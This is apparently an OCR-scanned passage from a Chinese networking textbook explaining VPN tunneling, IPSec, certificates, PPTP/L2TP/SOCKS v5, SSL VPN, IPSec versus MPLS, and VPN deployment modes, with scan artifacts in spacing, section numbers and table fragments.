公共 互联 网 络 的 拨号 连接 。 一 个 最 典型 的 例子 是 Internet 拨号 用 户 必须 在 创建 Internet 隧 
道 之 前 , 拨 通 本 地 ISP 取得 与 Internet 的 连接 。 

对 企业 内 部 网 络 来 说 ,客户 端 已 经 具有 同 企业 网 络 的 连接 ,所 以 ,由 企业 网 络 为 封装 负 
载 数据 提供 到 目标 隧道 服务 器 的 路 由 。 

大 多 数 用 户 认 为 VPN 只 能 使 用 拨号 连接 。 其 实 VPN 只 要 求 支持 IP 的 互联 网 络 。 一 
些 客户 端 (如 家 用 PC) 可 以 通过 使 用 拨号 方式 连接 Internet 建立 IP 传输 。 这 只 是 为 创建 隧 
道 所 做 的 初步 工作 ,并 不 属于 隧道 协议 。 

(2) 强制 隧道 

由 支持 VPN 的 拨号 接 人 服务 器 ,配置 和 创建 一 条 强制 隧道 (CCompulsory Tunnel) 。 此 
时 ,客户 端的 计算 机 不 作为 隧道 端点 ,而 是 由 位 于 客户 端 计算 机 和 隧道 服务 器 之 间 的 远程 接 
入 服务 器 作为 隧道 客户 端 ,成 为 隧道 的 一 个 端点 。 

目前 ,一些 商家 提供 了 能 够 代替 拨号 客户 创建 隧道 的 拨号 接 人 服务 器 。 这 些 能 够 为 客 
户 端 计 算 机 提供 隧道 的 计算 机 或 网 络 设备 ,包括 支持 PPTP 协议 的 前 端 处 理 器 (Front-end 
Processor, FEP) ,支持 L2TP 协议 的 L2TP 接 人 集线器 和 支持 IPSec 的 安全 IP 网 关 。 本 节 
将 主要 以 FEP 为 例 进行 说 明 。 为 正常 的 发 挥 功能 ,FEP 必须 安装 适当 的 隧道 协议 ,同时 必 
须 在 客户 端 计算 机 建立 起 连接 时 能 够 创建 隧道 。 

因为 用 户 只 能 使 用 由 FEP 创建 的 隧道 ,所 以 称 为 强制 隧道 。 一 旦 连接 成 功 ,所 有 客户 
端的 数据 流 将 自动 通过 隧道 发 送 。 使 用 强制 隧道 ,客户 端 计算 机 建立 单一 的 PPP 连接 , 当 
用 户 拨 入 NAS 时 ,一 条 隧道 将 被 创建 ,所 有 的 数据 流 将 会 自动 通过 该 隧道 路 由 。 可 以 配置 
FEP 为 所 有 的 拨号 户 创建 到 指定 隧道 服务 器 的 隧道 ,也 可 以 配置 FEP 基于 不 同 的 用 户 名 或 
目的 地 创建 不 同 的 隧道 。 

自愿 隧道 技术 为 每 个 用 户 创建 独立 的 隧道 。FEP 和 隧道 服务 器 之 间 建 立 的 隧道 可 以 
被 多 个 拨号 用 户 共享 ,而 不 必 为 每 个 用 户 都 建立 一 条 新 的 隧道 。 因 此 ,一 条 隧道 中 可 能 会 传 
递 多 个 用 户 的 数据 信息 。 所 以 ,只 有 在 最 后 一 个 隧道 用 户 断 开 连 接 之 后 , 才 终 止 整 条 隧道 。 


3. IPSec 安全 技术 


虽然 Internet 为 创建 VPN 提供 了 极 大 的 方便 ,但 是 需要 建立 强大 的 安全 功能 ,以 确保 
企业 内 部 网 络 不 受 外 来 攻击 ,确保 通过 公共 网 络 传送 的 企业 数据 的 安全 。 下 面 介绍 对 称 加 
密 与 非 对 称 加 密 (专用 密 钥 与 公用 密 钥 ) 的 基本 概念 。 这 两 种 技术 为 VPN 提供 了 安全 
保障 。 

对 称 加 密 ,或 专用 密 钥 (也 称 做 常规 加 密 ) ,通信 双方 共享 一 个 密 钥 。 发 送 方 使 用 密 钥 将 
明文 加 密 成 密 文 。 接 收 方 使 用 相同 的 密 钥 将 密 文 还 原 成 明文 。RSA RC4 算法 .DES、 国 际 
数据 加 密 算法 (IDEA) 以 及 Skip Jack 加 密 技 术 都 属于 对 称 加 密 方式 。 

非 对 称 加 密 ( 公 用 密 钥 ) ,通信 双方 使 用 两 个 不 同 的 密 钥 ,一 个 是 只 有 发 送 方 知道 的 专用 
密 钥 , 另 一 个 则 是 对 应 的 公用 密 钥 , 任 何人 都 可 以 获得 公用 密 钥 。 专 用 密 钥 和 公用 密 钥 在 加 
密 算法 上 相互 关联 ,一 个 用 于 数据 加 密 , 另 一 个 用 于 数据 解密 。 

公用 密 钥 加 密 技术 允许 对 信息 进行 数字 签名 。 数 字 签 名 使 用 发 送 方 的 专用 密 钥 对 所 发 
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送信 息 的 某 一 部 分 进行 加 密 。 接 收 方 收 到 该 信息 后 ,使 用 发 送 方 的 公用 密 钥 解 密 数 字 签 名 ， 
验证 发 送 方 身份 。 
4. IPSec 证 书 


使 用 对 称 加 密 时 ,发 送 方 和 接收 方 都 使 用 共享 的 加 密 密 钥 。 所 以 ,必须 在 进行 通信 之 
前 ,完成 密 钥 的 分 布 。 使 用 非 对 称 加 密 时 ,发 送 方 使 用 一 个 专用 密 钥 加 密 信 息 或 数字 签名 ， 
接收 方 使 用 公用 密 钥 解密 信息 。 公 用 密 钥 可 以 自由 分 布 给 任何 需要 接收 加 密 信息 或 数字 签 
名 的 一 方 ,发 送 方 只 要 保证 专用 密 钥 的 安全 性 即 可 。 

为 保证 公用 密 钥 的 完整 性 ,公用 密 钥 随 证 书 一 同 发 布 。 证 书 ( 或 公用 密 钥 证 书 ) 是 一 种 
经 证 书签 发 机 构 (CA) 数 字 签 名 的 数据 结构 。 证 书签 发 机 构 使 用 自己 的 专用 密 钥 对 证 书 进 
行 数字 签名 。 如 果 接 受 方 知道 证 书签 发 机 构 的 公用 密 钥 ,就 可 以 证 明证 书 是 由 证 书签 发 机 
构 签 发 。 

总 之 ,公用 密 钥 证 书 为 验证 发 送 方 的 身份 提供 了 一 种 方便 .可 靠 的 方法 。IPSec 可 以 使 
用 该 方式 进行 端 到 端的 验证 。RAS 可 以 使 用 公用 密 钥 证 书 验证 用 户 身份 。 


5. IPSec 协议 


IPSec 是 一 种 由 IETF 设计 的 端 到 端的 ,确保 基于 IP 通信 的 数据 安全 性 的 协议 。IPSec 
支持 数据 进行 加 密 , 同 时 确保 数据 的 完整 性 。IETF 规定 ,不 采用 数据 加 密 时 ,IPSec 使 用 验 
证 包头 (AH) 提 供 来 源 验证 (source authentication) ,以 确保 数据 的 完整 性 ; 采用 数据 加 密 
时 ,IPSec 使 用 封装 安全 负载 (ESP) 与 加 密 共同 提供 来 源 验 证 ,以 确保 数据 完整 性 。 使 用 
IPSec 协议 时 ,只 有 发 送 方 和 接收 方 知道 密 钥 。 如 果 验 证 数据 有 效 ,接受 方 就 可 以 知道 数据 
来 自发 送 方 , 并 且 知道 数据 在 传输 过 程 中 没有 受到 破坏 。 

IPSec 在 客户 机 和 服务 器 模式 下 ,不 能 同时 使 用 动态 地 址 分 配 技术 (如 DHCP)。 因 为 ， 
在 实际 应 用 中 ,IPSec 需要 事先 知道 一 个 固定 的 IP 地 址 或 一 个 固定 的 IP 地 址 段 ,以 便 使 用 
相应 的 公 钥 技术 。 因 此 ,动态 地 址 分 配 技术 不 适合 IPSec 技术 。 另 外 ,除了 TCP/IP 协议 ， 
IPSec 不 支持 其 他 协议 。 除 了 包 过 滤 外 ,IPSec 也 没有 制定 其 他 访问 方法 。IPSec 技术 发 展 
的 最 大 障碍 是 占 市 场 份额 很 大 的 Windows 系统 对 它 的 支持 不 够 。 

具体 的 VPN 隧道 技术 的 对 比如 表 13. 2 所 示 。 

表 13.2 VPN 隧道 技术 比较 
点 到 点 隧道 协议 一 一 PPTP 


PPTP 协议 将 控制 包 与 数据 包 分 开 , 控 制 包 采 用 TCP 控制 ,用 于 严格 的 状态 查询 及 口令 信息 ; 数据 包 部 
分 先 封装 在 PPP 协议 中 ,然后 封装 到 GRE V2 协议 中 。 需 要 注意 的 是 ,目前 PPTP 协议 基本 已 被 淘汰 ， 
不 再 被 使 用 在 VPN 产品 中 


第 二 层 隧 道 协 议 一 一 L2TP 


L2TP 是 国际 标准 隧道 协议 , 它 结 合 了 PPTP 协议 以 及 L2F 协议 的 优点 ,L2TP 提供 了 一 种 PPP 包 过 滤 
机 制 , 特 别 适 用 于 通过 VPN 拨号 接 人 一 个 专用 网 络 用 户 。 但 是 L2TP 没有 任何 加 密 措施 , 它 更 多 是 和 
IPSec 协议 结合 使 用 ,提供 隧道 验证 
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续 表 
IPSec 协议 


IPSec 协议 是 一 个 范围 广泛 、 开 放 的 VPN 安全 协议 , 它 工 作 在 OSI 模型 中 的 第 三 层 一 一 网 络 层 。 它 提 
供 所 有 在 网 络 层 上 的 数据 保护 和 透明 的 安全 通信 。IPSec 协议 可 以 在 两 种 模式 下 运行 : 一 种 是 隧道 模 
式 , 一 种 是 传输 模式 。 在 隧道 模式 下 ,IPSec 把 IPv4 数据 包 封装 在 安全 的 IP 帧 中 。 传 输 模式 是 为 了 保 
护 端 到 端的 安全 性 ,不 会 隐藏 路 由 信息 。1999 年 底 ,IETF 安全 工作 组 完成 了 IPSec 的 扩展 ,在 IPSec 协 
议 中 加 上 了 ISAKMP 协议 ,其 中 还 包括 密 钥 分 配 协 议 IKE 和 Oakley。 现 在 流行 的 一 种 趋势 是 将 L2TP 
和 IPSec 结合 起 来 使 用 ,用 L2TP 协议 作为 隧道 协议 ,用 IPSec 协议 保护 数据 。 目前, 市场 上 大 部 分 
VPN 产品 都 采用 这 种 技术 

优点 : 它 定 义 了 一 套用 于 保护 私有 性 和 完整 性 的 标准 协议 ,可 确保 运行 在 TCP/IP 协议 上 的 VPN 之 间 
的 互 操作 性 

缺点 : 除了 包 过 滤 外 , 它 没有 指定 其 他 访问 控制 方法 ,对 于 采用 NAT 方式 访问 公共 网 络 的 情况 ,难以 
处 理 

适用 场合 : 最 适合 可 信 LAN 到 LAN 之 间 的 VPN 


SOCKS v5 协议 


SOCKS v5 工作 在 OSI 模型 中 的 第 5 层 一 一 会 话 层 ,可 作为 建立 高 度 安 全 的 VPN 的 基础 。SOCKS v5 
协议 的 优势 在 访问 控制 ,因此 适用 于 安全 性 较 高 的 VPN。SOCKS v5 现在 被 作为 建立 VPN 的 标准 
优点 : 非常 详细 的 访问 控制 。 在 网 络 层 只 能 根据 源 目 的 IP 地 址 允许 或 拒绝 通过 ,在 会 话 层 控制 策略 更 
多 一 些 ; 由 于 工作 在 会 话 层 ,所 以 ,能 同 低层 协议 如 IPV4、IPSec、PPTP、L2TP 一 起 使 用 ; 用 SOCKS v5 
的 代理 服务 器 可 隐藏 网 络 地 址 结构 ; 能 为 认证 、 加 密 和 密 钥 管 理 提供 “插件 ”模块 ,让 用 户 自由 地 采用 所 
需要 的 技术 。SOCKS v5 可 根据 规则 过 滤 数 据 流 ,包括 Java Applet 和 Actives 控制 

缺点 : 其 性 能 比 低层 次 协议 差 , 必 须 制定 更 复杂 的 安全 管理 策略 

适用 场合 : 最 适合 用 于 客户 机 到 服务 器 的 连接 模式 ,适用 于 外 部 网 VPN 和 远程 访问 VPN 


1336 SSL 虚拟 专 网 的 新 发 展 


过 去 几 年 ,由 于 VPN 比 租用 专线 更 加 便宜 .灵活 ,所 以 越 来 越 多 的 公司 采用 VPN ,连接 
在 家 工作 和 出 差 在 外 的 员工 ,以 及 替代 连接 分 公司 和 合作 伙伴 的 标准 广域网 。VPN 构建 在 
互联 网 的 公共 网 络 架 构 上 ,通过 隧道 协议 ,在 发 送 端 加 密 数据 ,在 接收 端 解密 数据 ,以 保证 数 
据 的 保密 性 。 但 是 ,VPN 的 广泛 使 用 给 公司 内 部 IT 部 门 带 来 更 多 的 工作 ,因为 VPN 的 使 
用 者 在 下 载 软件 和 维持 连接 时 需要 IT 部 门 的 支持 。 

一 种 被 称 为 “瞬间 虚拟 外 部 网 ”的 技术 ,可 以 帮助 IT 部 门 解决 此 问题 。 它 是 将 SSL( 安 全 
插 接 层 ) 技 术 与 标准 的 VPN 结合 起 来 , 极 大 地 方便 了 使 用 者 通过 浏览 器 访问 支持 Web 的 数 
据 。 在 VPN 上 实现 SSL 有 三 种 方法 : 第 一 种 是 Neoteris、 Netilla 和 Rainbow Technologies 
等 公司 生产 的 基于 SSL 的 Web 安全 装置 ,连接 到 企业 的 服务 器 上 ; 第 二 种 方法 是 
CheckPoint、Nortel 和 OpenReach 等 公司 提供 的 、 加 在 传统 的 IPSec VPN 上 的 SSL 软件 ; 
第 三 种 方法 就 是 将 SSL VPN 作为 一 种 服务 对 外 提供 ,用 户 公司 既 不 用 在 服务 器 上 装 SSL 
安全 装置 ,也 不 用 购买 SSL 软件 ,就 能 使 用 SSL VPN。 

采用 SSL VPN 的 好 处 就 是 降低 成 本 。 虽 然 购买 软件 或 硬件 的 费用 不 一 定 便宜 ,但 部 
署 SSL VPN 很 便宜 。 使 用 者 基本 上 就 不 需要 IT 部 门 的 支持 了 ,只 要 使 用 其 PC 机 上 的 浏 
览 器 在 公司 网 页 上 注册 即 可 。 
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SSL VPN 的 不 足 之 处 主要 是 它 的 用 途 受 限 。 因 为 它 只 能 访问 支持 Web 的 数据 ,所 以 
用 户 不 能 连接 到 不 支持 Web 的 应 用 程序 。 如 果 一 定 要 访问 这 类 应 用 程序 ,就 必须 购买 客户 
端 /服务 器 型 的 VPN。 一 家 公司 同时 维持 SSL VPN 和 IPSec VPN 是 很 麻烦 的 。 此 外 ,SSL 
系统 内 可 能 没有 安装 安全 功能 ,所 以 不 得 不 另 买 安全 产品 。 


13.37 IPSec VPN 和 MPLS VPN 之 比较 


多 协议 标记 交换 (Multiprotocol Label Switching,MPLS) 技 术 作 为 一 种 新 兴 的 路 由 交 
换 技术 , 越 来 越 受 到 关注 。MPLS 技术 是 结合 2 层 交 换 和 3 层 路 由 的 L2/1L3 集成 数据 传输 
技术 , 它 不 仅 支持 网 络 层 的 多 种 协议 ,还 可 以 兼容 多 种 链 路 层 技术 。 

本 小 节 将 分 析 这 两 种 VPN 之 间 的 相似 之 处 ,它们 之 间 的 差异 、 以 及 各 自 的 优点 。 

VPN 服务 的 目的 就 是 在 共享 的 基础 公共 网 络 上 向 用 户 提 供 网 络 连 接 , 不 仅 如 此 ,VPN 
连接 应 使 用 户 获得 等 同 于 专 有 网 络 的 通信 体验 。 实 用 的 VPN 解决 方案 应 能 够 防御 非法 入 
侵 , 防 范 网 络 阻 塞 ,而 且 应 确保 安全 、 及 时 地 交付 用 户 的 重要 数据 ,在 实现 这 些 功 能 的 同时 
VPN 还 应 具有 良好 的 可 管理 性 。 综 上 所 述 ,VPN 的 基本 属性 分 成 了 5 个 类 别 ,VPN 的 基 
本 属性 如 表 13. 3 所 示 。 

表 13.3 VPN 的 基本 属性 

可 伸缩 性 不 论 是 小 型 的 办 公 室 配置 网 络 还 是 大 型 的 企业 网 络 ,VPN 平台 都 应 该 在 全 网 规模 上 
实现 自身 的 可 伸缩 性 ; VPN 的 带宽 变动 和 连接 需要 的 适应 能 力 ,在 一 个 合理 的 VPN 
解决 方案 中 至 关 重 要 。 同 时 ,VPN 必须 具备 高 度 的 可 伸缩 性 以 应 对 计划 外 的 需求 。 
通常 的 MPLS 部 署 就 必须 涉及 具有 高 伸缩 性 的 方案 ,在 同一 网 络 上 应 能 实现 上 万 的 


用 户 接 入 

安全 性 保证 商业 上 重要 的 数据 流量 通过 隧道 加 密 、 流 量 分 离 .数据 包 认证 、 用 户 认证 和 访问 
控制 等 机 制 ,从 而 保证 其 机 密 性 

QoS 保证 重要 的 或 者 对 延迟 敏感 的 数据 流量 的 优先 权 , 通 过 变动 带宽 速率 来 管理 网 络 的 


拥塞 。QoS 功能 可 以 通过 排队 ,防止 网 络 阻塞 ,流量 整形 和 数据 包 分 类 以 及 采用 优化 
的 路 由 协议 的 VPN 路 由 服务 等 方式 实现 

可 管理 性 高 级 监控 和 自动 数据 流 系统 实现 了 新 型 服务 的 快速 部 署 ,服务 级 协议 (SLA) 逐 渐 受 
到 欢迎 , 它 支持 安全 策略 和 QoS 策略 .管理 和 计 费 的 高 性 价 比 , 因 此 ,采用 相应 的 合 
理 管 理 措施 成 为 必然 

可 靠 性 商业 用 户 希 望 获得 的 可 预计 的 、 极 高 的 服务 可 靠 性 


IETF 把 IPSec 和 MPLS 的 集成 问题 留 给 具体 实施 者 来 完成 ,结果 就 出 现 了 两 种 VPN 
架构 ,这 两 种 架构 各 自 依赖 于 IPSec 或 者 MPLS 技术 。 服 务 供应 商 则 根据 其 服务 用 户 的 需 
要 以 及 自身 可 提供 的 新 型 增值 服务 而 推出 相应 的 一 种 或 者 两 种 VPN 架构 。 

IPSec 和 MPLS 两 种 VPN 的 特点 对 比如 表 13. 4 所 示 ,而 两 者 之 间 的 差别 如 表 13. 5 所 示 。 

服务 供应 商 可 以 部 署 一 种 或 者 同时 部 署 多 种 VPN 架构 ,来 支持 其 新 型 增值 服务 ,从 而 
提升 IPSec 和 MPLS 的 应 用 层次 。 服 务 供 应 商 可 以 对 那些 需要 较 高 认证 和 私密 性 的 数据 
流 实行 IPSec, 而 对 比 第 二 层 专 有 数据 网 络 带宽 流量 工程 和 QoS 等 要 求实 行 MPLS。 在 
Cisco VPN Solution Center 的 统一 管理 下 ,这 种 组 合 可 以 让 服务 供应 商 提供 有 区 别 的 新 型 
服务 ,其 范围 覆盖 了 安全 .QoS 和 流量 有 限 传输 等 多 种 用 户 需 求 。IPSec 和 MPLS 集成 
VPN 架构 如 图 13. 6 所 示 。 
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表 13.4 IPSec 和 MPLS 特点 对 比 表 


IPsec VPN 


MPLS VPN 


服务 模式 


可 伸缩 性 


网 络 位 置 


高 速 Internet 服务 、 商 业 质 量 的 
IP 服务 、 电 子 商 务 和 应 用 主机 托 
管 服务 

大 规模 部 署 需要 制定 相应 计划 ， 
并 且 协 同 解决 关键 分 支 机 构 、 关 
键 管理 和 对 等 配置 各 方面 出 现 
的 问题 

本 地 环 路 .网 络 边缘 ,此 类 地 点 
最 适合 采用 隧道 和 加 密 的 IP sec 
安全 机 制 


表 13.5 
IPSec VPN 


高 速 Internet 服务 、 商 业 质 量 的 IP 服务 、 电 子 商 务 和 
应 用 主机 托管 服务 


由 于 不 需要 站 点 对 站 点 的 对 等 性 ,而 具有 高 度 的 可 伸 
缩 性 。 典 型 的 MPLS VPN 部 署 能 够 支持 在 同一 网 络 
上 部 署 上 万 个 VPN 组 


在 服务 供应 商 的 核心 网 络 部 署 最 佳 ,因为 QoS、 流 量 控 
制 和 带宽 速率 可 以 得 到 完全 的 控制 。 在 服务 供应 商 提 
供 SLA 或 SLG( 服 务 级 保证 ) 时 ,MPLS VPN 便 可 以 
部 署 在 网 络 的 核心 


IPSec 和 MPLS 差别 对 比 表 


MPLS VPN 


透明 度 


网 络 环境 


服务 部 署 


会 话 认证 


机 密 性 


服务 质量 


客户 支持 


用 户 交 互 


IPSec VPN 位 于 网 络 层 ,对 应 用 
层 是 透明 的 

在 部 署 了 基于 网 络 的 IPSec 
VPN 服务 之 后 ,服务 供应 商 通 
常 提供 了 集中 的 环境 和 管理 
支持 

响应 市 场 变化 的 速度 ,可 以 在 现 
有 的 任何 全 网 络 上 部 署 


每 个 IPSec 会 话 都 必须 通过 数字 
签名 或 预先 分 配 的 密 钥 进行 认 
证 ; 不 符合 安全 策略 的 数据 包 都 
被 丢弃 

IPSec VPN 通过 网 络 层 上 的 一 
整套 灵活 的 加 密 和 隧道 机 制 ,来 
保障 数据 的 私密 性 

虽然 IPSec 协议 并 没有 解决 网 络 
的 可 靠 性 或 者 QoS 机 制 等 方面 
的 问题 ,但 是 Cisco IPSec VPN 
部 署 方 案 可 以 在 IPSec 隧道 内 保 
留 数据 包 分 类 ,从 而 实现 QoS 
需要 客户 端 初始 化 IPSec VPN， 
Cisco VPN 软件 可 运行 在 
Windows Solaris, Linux、 Macintosh 
等 不 同 平台 上 

由 于 客户 端 需要 初始 化 IPSec 
VPN 服务 ,所 以 用 户 需 要 同 
IPSec 软件 交互 


MPLS VPN 运行 在 IP 十 ATM 或 者 IP 环境 下 ,对 应 用 
层 是 完全 透明 的 

由 于 MPLS VPN 站 点 只 同 服务 供应 商 网 络 对 等 ,所 以 
服务 激活 只 需要 一 次 性 地 在 用 户 边 (CE) 和 服务 供应 
商 边 (PE) 设 备 进行 配置 准备 ,就 可 以 让 站 点 成 为 某 个 
MPLS VPN 组 的 成 员 

需要 启用 MPLS 的 核心 网 络 共享 设备 ,比如 在 网 络 升 
级 期 间或 者 必须 部 署 新 的 MPLS 网 络 时 ,都 得 和 核心 
网 络 的 设备 打交道 

VPN 成 员 资格 由 服务 供应 商 决 定 , 这 是 根据 逻辑 端口 
和 唯一 路 由 描述 符 所 组 成 的 环境 功能 实现 的 ; 对 VPN 
组 未 经 过 认证 的 访问 被 设备 所 拒绝 


MPLS VPN 结构 用 一 种 类 似 可 信任 帧 中 继 或 ATM 网 
络 的 方式 ,来 区 分 用 户 流量 ,从 而 实现 VPN 的 安全 性 


优秀 的 MPLS VPN 实施 方案 可 以 提供 可 伸缩 的 .稳固 
的 QoS 机 制 和 流量 工程 能 力 , 从 而 使 服务 供应 商 可 以 
提供 具有 保证 SLA 的 IP 增值 服务 


MPLS VPN 是 基于 网 络 的 VPN 服务 


无 需 用 户 交互 
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合伙 人 2 合伙 人 3 
图 13.6 IPSec 和 MPLS 集成 VPN 架构 示意 图 


13.4 实现 VPN 的 安全 技术 


VPN 是 在 不 安全 的 Internet 中 进行 通信 的 ,通信 的 内 容 可 能 涉及 到 单位 或 公司 的 机 密 
数据 ,因此 其 安全 性 非常 重要 。VPN 中 的 安全 技术 通常 由 认证 加密 、 密 钥 交换 与 管理 三 部 
分 组 成 。 下 面 对 这 三 部 分 进行 简单 介绍 。 


13.41 认证 技术 


认证 技术 可 以 防止 数据 被 伪造 和 算 改 , 它 采 用 一 种 被 称 为 “摘要 ”的 技术 。“ 摘 要 ”技术 
主要 采用 HASH 函数 ,将 一 段 长 的 报 文 通过 函数 变换 ,映射 为 一 段 短 的 报 文 , 即 摘要 。 由 
于 HASH 函数 的 特性 ,两 个 不 同 的 报 文具 有 相同 的 “摘要 ”几乎 是 不 可 能 的 。 该 特性 使 得 
“摘要 ”技术 在 VPN 中 有 两 个 用 途 : 验证 数据 的 完整 性 和 进行 用 户 认证 。 


13.42 加 密 技术 


IPSec 通过 ISAKMP/IKE/Oakley 协商 确定 几 种 可 选 的 数据 加 密 算法 ,如 DES、3DES 
等 。DES 密 钥 长 度 为 56 位 ,容易 被 破译 ,3DES 使 用 三 重 加 密 增加 了 安全 性 。 国 外 还 有 更 
好 的 加 密 算法 ,但 国外 禁止 出 口 高 位 加 密 算法 。 同 样 ,国内 也 禁止 重要 部 门 使 用 国外 算法 。 
国内 算法 不 对 外 公开 ,因此 ,被 破解 的 可 能 性 也 很 小 。 


1343 密 钥 交换 和 管理 


VPN 中 密 钥 的 分 发 与 管理 非常 重要 。 密 钥 的 分 发 有 两 种 方法 : 一 种 是 通过 手工 配置 
的 方式 ; 另 一 种 采用 密 钥 交换 协议 动态 分 发 。 手 工 配置 的 方式 由 于 密 钥 更 新 困难 ,只 适合 
于 简单 的 网 络 。 密 钥 交 换 协 议 采 用 软件 方式 动态 生成 密 钥 , 适 合 于 复杂 的 网 络 且 密 钥 可 快 
速 更 新 ,可 以 显著 提高 VPN 的 安全 性 。 目 前 主要 的 密 钥 交换 与 管理 标准 有 IKE( 互 联网 密 
钥 交换 )、SKIP( 互 联网 简单 密 钥 管理 ) 和 Oakley。 
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13.5 VPN 组 网 方式 


VPN 在 企业 中 的 组 网 方式 分 以 下 3 种 。 在 各 种 组 网 方式 下 采用 的 隧道 协议 有 所 不 同 ， 
所 以 在 应 用 时 需要 仔细 选择 。 


13.5.1 Access VPN: 客户 端 到 网 关 


如 果 企 业 的 内 部 人 员 有 远程 办 公 需 要 ,或 者 厂商 要 提供 B2C 的 安全 访问 服务 ,就 可 以 
考虑 使 用 Access VPN( 远 程 访问 VPN) 。 这 种 方式 适用 于 流动 人 员 远 程 办 公 , 它 让 远程 用 
户 拨号 接 人 到 本 地 的 ISP, 可 大 幅度 降低 电话 费用 。SOCKS v5 协议 适合 这 类 连接 。 

Access VPN 通过 一 个 拥有 与 专用 网 络 相同 策略 的 共享 基础 设施 ,提供 对 企业 内 部 网 
或 外 部 网 的 远程 访问 。Access VPN 能 使 用 户 随时 随地 以 其 所 需 的 方式 访问 企业 资源 。 
Access VPN 包括 模拟 、 拨 号 .ISDN 数字 用 户 线 路 (xDSL) .移动 IP 和 电缆 技术 ,能 够 安全 
地 连接 移动 用 户 、 远 程 用 户 或 分 支 机 构 。Access VPN 网 络 连 接 如 图 13.7 所 示 。 


L2F/L2TP 


使 用 PPP 连 接 的 终端 小 型 局 域 网 
图 13.7 Access VPN 网 络 连接 图 


Access VPN 适用 于 公司 内 部 经 常 有 流动 人 员 远 程 办 公 的 情况 。 出 差 员 工 利用 当地 
ISP 提供 的 VPN 服务 ,就 可 以 和 公司 的 VPN 网 关 建 立 私 有 的 隧道 连接 。RADIUS 服务 器 
可 对 员工 身份 进行 验证 和 授权 ,保证 连接 的 安全 。 

Access VPN 对 用 户 的 吸引 力 在 于 一 下 几 个 方面 。 

。 减少 用 于 相关 的 调制 解 调 器 和 终端 服务 设备 的 资金 及 费用 ,简化 网 络 。 
实现 本 地 拨号 接 入 的 功能 来 取代 远 距 离 接 入 或 800 电话 接 入 ,这 样 能 显著 降低 远 距 
离 通 信 的 费用 。 
极 大 的 可 扩展 性 ,简便 地 对 加 入 网 络 的 新 用 户 进行 调度 。 
。 远程 验证 氢 入 用 户 服 务 (RADIUS) 是 基于 标准 ,基于 策略 功能 的 安全 服务 。 
。 将 工作 重心 从 管理 和 保留 运作 拨号 网 络 的 工作 人 员 转 到 公司 的 核心 业务 上 来 。 


13.52 ”Intranet VPN: 网 关 到 网 关 
越 来 越 多 的 企业 需要 在 全 国 乃 至 世界 范围 内 建立 各 种 办 事 机 构 、 分 公司 .研究 所 等 ,各 
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个 分 公司 之 间 传 统 的 网 络 连接 方式 一 般 是 租用 专线 。 随 着 分 公司 的 增多 ,业务 开展 越 来 越 
广泛 ,网 络 结构 趋 于 复杂 , 且 建设 和 维护 费用 也 日 益 昂 贵 。 

Intranet VPN (企业 内 部 VPN ) 方 式 适用 于 公司 两 个 异地 机 构 的 局 域 网 互联 ,在 
Internet 上 组 建 世界 范围 内 的 企业 网 。 利 用 Internet 的 线路 可 以 保证 网 络 的 互联 性 ,而 利 
用 隧道 .加密 等 VPN 特性 可 以 保证 信息 在 整个 Intranet VPN 上 安全 传输 。IPSec 隧道 协 
议 可 满足 所 有 网 关 到 网 关 的 VPN 连接 ,因此 ,在 这 类 组 网 方式 中 用 得 最 多 。 如 果 要 进行 企 
业内 部 各 分 支 机 构 的 互联 ,使 用 Intranet VPN 是 很 好 的 方式 。 网 络 连接 如 图 13. 8 所 示 ,其 
中 POP 为 英文 point-to-point 的 缩 略 语 。 


远程 办 公 


Sped 
pe 


图 13.8 Intranet VPN 网 络 连 接 图 


Intranet VPN 对 用 户 的 吸引 力 在 于 以 下 几 个 方面 。 

。 减 少 了 WAN 带宽 的 费用 。 

。 能 使 用 灵活 的 拓扑 结构 ,包括 全 网 络 连 接 。 

。 新 的 站 点 能 更 快 、 更 容易 地 被 连接 。 

。 通过 设备 供应 商 WAN 的 连接 元 余 , 可 以 延长 网 络 的 可 用 时 间 。 


13.53 ”Extranet VPN: 与 合作 伙伴 企业 网 构成 外 联网 


随 着 信息 时 代 的 到 来 ,各 个 企业 越 来 越 重视 各 种 信息 的 处 理 。 企 业 希 望 可 以 提供 给 客 
户 最 快捷 方便 的 信息 服务 ,希望 通过 各 种 方式 了 解 客户 的 需要 ,同时 各 个 企业 之 间 的 合作 关 
系 也 越 来 越 多 ,信息 交换 也 日 益 频 繁 。Internet 为 这 样 的 发 展 趋势 提供 了 和 良好 的 基础 ,如 果 
工作 中 需要 B2B 之 间 的 安全 访问 服务 , 则 可 以 考虑 Extranet VPN( 扩 展 的 企业 内 部 VPN)。 
它 既 可 以 向 客户 、 合 作 伙伴 提供 有 效 的 信息 服务 ,又 可 以 保证 自身 的 内 部 网 络 的 安全 。 
Extranet VPN 网 络 连接 如 图 13. 9 所 示 。 

Extranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 ,将 客户 、 供 应 商 、 合 作 伙伴 或 兴 
趣 群体 连接 到 企业 内 部 网 。 企 业 拥 有 与 专用 网 络 相同 的 策略 ,包括 安全 .服务 质量 (QoS)、 
可 管理 性 和 可 靠 性 。 

Extranet VPN 对 用 户 的 吸引 力 在 于 以 下 几 个 方面 。 

。 能 方便 地 对 外 部 网 进行 部 署 和 管理 。 

。 外 部 网 可 以 使 用 与 内 部 网 相同 的 架构 和 协议 进行 部 署 。 

。 严格 的 许可 认证 机 制 ,外 部 网 的 用 户 被 许可 只 有 一 次 机 会 连接 到 其 合作 人 的 网 络 。 
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商业 合作 伙伴 


便 


FR,ATMD) 


用 户 
图 13. 9 Extranet VPN 网 络 连接 图 


13.6 VPN 技术 的 优 缺 点 


VPN 作为 一 种 网 络 技术 ,必然 有 它 的 优 缺 点 ,本 节 分 别 总 结 了 VPN 技术 的 优点 和 
缺点 。 


1. VPN 的 优点 


。 节省 成 本 : 企业 不 需要 建立 和 维护 一 套 广域网 系统 , 它 把 这 一 任务 交 给 当地 的 ISP 
来 完成 。 同 时 企业 使 用 VPN 技术 代替 原先 租用 的 专线 ,也 节省 了 线路 的 费用 。 
实现 网 络 安全 : VPN 支持 隧道 技术 和 安全 技术 ,保证 数据 在 传输 过 程 中 无 法 被 
解密 。 

简化 网 络 结构 : 企业 只 需要 关注 本 身 的 局 域 网 结构 ,并 维护 好 一 个 连接 公 网 的 接口 
即 可 。 安 装 及 维护 大 型 广域网 或 城 域 网 的 繁重 工作 都 被 完善 的 公 网 网 络 环境 所 
替代 。 

连接 的 随意 性 : 当 企 业 增 设 新 的 分 支 机 构 时 ,只 需 为 新 的 分 支 机 构 设置 上 网 功能 ， 
